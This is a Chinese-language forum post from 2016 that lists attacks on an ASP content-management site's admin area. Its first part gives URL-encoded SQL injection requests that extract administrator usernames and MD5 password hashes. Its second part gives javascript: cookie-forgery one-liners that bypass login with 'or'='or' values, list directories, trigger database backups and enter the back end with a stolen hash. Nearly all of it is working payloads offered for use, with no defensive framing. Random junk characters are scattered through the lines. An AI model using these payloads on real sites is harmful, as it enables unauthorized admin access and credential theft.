一、注入" L0 p& k8 ^' t5 h, j. C1 C
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
) c7 Q- ?; L' p. r. u) o x; f/ O4 n3 A& J2 J
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
$ _ Z) j" X! _第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin3 @8 T. ^4 E( u X, z- G
可得到用户名和MD5加密码的密码。3 G, @; y5 S% a. p0 f: ?" B. Y# O
. J& \4 G% P* h) a9 n# [" f9 e, g二、cookies欺骗1 i8 u8 \1 R4 K% p: Z7 g. y
$ w% c8 s" h8 m ]
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
7 x- Q, G. v' m, N/ [9 \javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
. R0 n& ` q6 d3 T2 j4 B3 {6 T# }* B$ q7 x" H) |& M
2、列目录.
0 I7 K* `8 J9 q E, Cjavascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
% y) n$ x. S6 I+ r2 J x$ Z/ i! p8 B [- e/ n- h
3、数据库备份(适用性好像比较低.) : p! P6 C8 y+ g. `' w. w. a
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
; j" R! b' c# e% D( B) `- P6 h! j6 y2 R: Y9 a6 K2 O
4、得到MD5密码解不了密进后台方法
2 M! k1 S6 o% @# g' D4 Jjavascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
8 k0 V3 \( y' q8 h |
发表于 2016-5-11 14:55:08
收藏
支持
反对